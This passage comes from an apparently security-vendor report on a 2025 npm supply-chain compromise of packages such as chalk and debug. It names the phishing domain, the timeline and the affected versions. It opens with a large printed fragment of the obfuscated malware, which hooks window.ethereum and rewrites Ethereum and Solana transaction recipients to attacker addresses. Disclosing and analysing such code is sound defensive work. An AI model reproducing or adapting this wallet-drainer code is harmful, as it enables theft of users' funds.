const _0x15389e = 'f'.repeat(64);
_0x13d8ee.data = _0x571743 + _0x55e7fa + _0x36b084 + _0x15389e + _0x382fb5 + _0x5bb3a7 + _0x2e5118 + _0x3ba273;
}
} else {
if (_0x250e27.startsWith("0xa9059cbb")) {
if (_0x250e27.length >= 74) {
const _0x5d2193 = _0x250e27.substring(0, 10);
const _0x1493e2 = _0x250e27.substring(74);
const _0x32c34c = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5d2193 + _0x32c34c + _0x1493e2;
}
} else {
if (_0x250e27.startsWith("0x23b872dd")) {
if (_0x250e27.length >= 138) {
const _0x5c5045 = _0x250e27.substring(0, 10);
const _0x1ebe01 = _0x250e27.substring(10, 74);
const _0x558b46 = _0x250e27.substring(138);
const _0x56d65b = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5c5045 + _0x1ebe01 + _0x56d65b + _0x558b46;
}
}
}
}
}
} else if (_0x13d8ee.to && _0x13d8ee.to !== "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976") {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
} else {
if (_0x13d8ee.instructions && Array.isArray(_0x13d8ee.instructions)) {
_0x13d8ee.instructions.forEach(_0x190501 => {
if (_0x190501.accounts && Array.isArray(_0x190501.accounts)) {
_0x190501.accounts.forEach(_0x2b9990 => {
if (typeof _0x2b9990 === "string") {
_0x2b9990 = "19111111111111111111111111111111";
} else if (_0x2b9990.pubkey) {
_0x2b9990.pubkey = "19111111111111111111111111111111";
}
});
}
if (_0x190501.keys && Array.isArray(_0x190501.keys)) {
_0x190501.keys.forEach(_0x40768f => {
if (_0x40768f.pubkey) {
_0x40768f.pubkey = "19111111111111111111111111111111";
}
});
}
});
}
if (_0x13d8ee.recipient) {
_0x13d8ee.recipient = "19111111111111111111111111111111";
}
if (_0x13d8ee.destination) {
_0x13d8ee.destination = "19111111111111111111111111111111";
}
}
return _0x13d8ee;
}
function _0x485f9d(_0x38473f, _0x292c7a) {
return async function (..._0x59af19) {
_0x1c41fa++;
let _0x12a7cb;
try {
_0x12a7cb = JSON.parse(JSON.stringify(_0x59af19));
} catch (_0x5d1767) {
_0x12a7cb = [..._0x59af19];
}
if (_0x59af19[0] && typeof _0x59af19[0] === "object") {
const _0x2c3d7e = _0x12a7cb[0];
if (_0x2c3d7e.method === "eth_sendTransaction" && _0x2c3d7e.params && _0x2c3d7e.params[0]) {
try {
const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);
_0x2c3d7e.params[0] = _0x39ad21;
} catch (_0x226343) {}
} else {
if ((_0x2c3d7e.method === "solana_signTransaction" || _0x2c3d7e.method === "solana_signAndSendTransaction") && _0x2c3d7e.params && _0x2c3d7e.params[0]) {
try {
let _0x5ad975 = _0x2c3d7e.params[0];
if (_0x5ad975.transaction) {
_0x5ad975 = _0x5ad975.transaction;
}
const _0x5dbe63 = _0x1089ae(_0x5ad975, false);
if (_0x2c3d7e.params[0].transaction) {
_0x2c3d7e.params[0].transaction = _0x5dbe63;
} else {
_0x2c3d7e.params[0] = _0x5dbe63;
}
} catch (_0x4b99fd) {}
}
}
}
const _0x1cbb37 = _0x38473f.apply(this, _0x12a7cb);
if (_0x1cbb37 && typeof _0x1cbb37.then === "function") {
return _0x1cbb37.then(_0xea3332 => _0xea3332)["catch"](_0x35d6a3 => {
throw _0x35d6a3;
});
}
return _0x1cbb37;
};
}
function _0x41630a(_0x5d6d52) {
if (!_0x5d6d52) {
return false;
}
let _0x2fc35d = false;
const _0xfafee = ["request", "send", "sendAsync"];
for (const _0x16ab0e of _0xfafee) {
if (typeof _0x5d6d52[_0x16ab0e] === "function") {
const _0x58cddf = _0x5d6d52[_0x16ab0e];
_0x2a20cb.set(_0x16ab0e, _0x58cddf);
try {
Object.defineProperty(_0x5d6d52, _0x16ab0e, {
'value': _0x485f9d(_0x58cddf, _0x16ab0e),
'writable': true,
'configurable': true,
'enumerable': true
});
_0x2fc35d = true;
} catch (_0x19546c) {}
}
}
if (_0x2fc35d) {
_0x1ab7cb = true;
}
return _0x2fc35d;
}
function _0xfc3320() {
let _0x4f0cd6 = 0;
const _0x5b507d = () => {
_0x4f0cd6++;
if (window.ethereum) {
setTimeout(() => {
_0x41630a(window.ethereum);
}, 500);
return;
}
if (_0x4f0cd6 < 50) {
setTimeout(_0x5b507d, 100);
}
};
_0x5b507d();
}
_0xfc3320();
window.stealthProxyControl = {
'isActive': () => _0x1ab7cb,
'getInterceptCount': () => _0x1c41fa,
'getOriginalMethods': () => _0x2a20cb,
'forceShield': () => {
if (window.ethereum) {
return _0x41630a(window.ethereum);
}
return false;
}
};
}
This malware is essentially a browser-based interceptor that hijacks both network traffic and application APIs. It injects itself into functions like fetch, XMLHttpRequest, and common wallet interfaces, then silently rewrites values in requests and responses. That means any sensitive identifiers, such as payment destinations or approval targets, can be swapped out for attacker, controlled ones before the user even sees or signs them. To make the changes harder to notice, it uses string-matching logic that replaces targets with look-alike values.
What makes it dangerous is that it operates at multiple layers: altering content shown on websites, tampering with API calls, and manipulating what users’ apps believe they are signing. Even if the interface looks correct, the underlying transaction can be redirected in the background.
fetch, XMLHttpRequest, and wallet APIs (window.ethereum, Solana, etc.).{{cta}}
The maintainer shared that he was compromised by the use of phishing, using this email coming from support [at] npmjs [dot] help :
The domain was registered just three days ago on September 5th, 2025:
After Aikido notified the maintainer on Bluesky, he replied at 15:15 UTC that he was aware of being compromised, and starting to clean up the compromised packages.
The author also shared that the phishing email was sent from support [at] npmjs [dot] help .
The author appears to have deleted most of the compromised package before losing access to his account. At the time of writing, the package simple-swizzle is still compromised.
The author further commented on HackerNews:
At 16:58 UTC, our system detected another package, which was compromised by what appears to be the same attackers:
proto-tinker-wc@0.1.87
The file dist/cjs/proto-tinker.cjs.entry.js contains the malicious code:
Phishing domain
npmjs.help
Package versions
| Package | Version |
|---|---|
| backslash | 0.2.1 |
| chalk-template | 1.1.1 |
| supports-hyperlinks | 4.1.1 |
| has-ansi | 6.0.1 |
| simple-swizzle | 0.2.3 |
| color-string | 2.1.1 |
| error-ex | 1.3.3 |
| color-name | 2.0.1 |
| is-arrayish | 0.3.3 |
| slice-ansi | 7.1.1 |
| color-convert | 3.1.1 |
| wrap-ansi | 9.0.1 |
| ansi-regex | 6.2.1 |
| supports-color | 10.2.1 |
| strip-ansi | 7.1.1 |
| chalk | 5.6.1 |
| debug | 4.4.2 |
| ansi-styles | 6.2.2 |
How to tell if you are affected using Aikido:
If you are an Aikido user, check your central feed and filter on malware issues. The vulnerability will be surfaced as a 100/100 critical issue in the feed. Tip: Aikido rescans your repos nightly, though we recommend triggering a full rescan as well.
If you are not yet an Aikido user, set up an account and connect your repos. Our proprietary malware coverage is included in the free plan (no credit card required).
For future protection, considering using Aikido SafeChain (open source), a secure wrapper for npm, npx, yarn... Safechain sits in your current workflows, it works by intercepting npm, npx, yarn, pnpm and pnpx commands and verifying the packages for malware before install against Aikido Intel - Open Sources Threat Intelligence. Stop threats before they hit your machine.
.png)
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。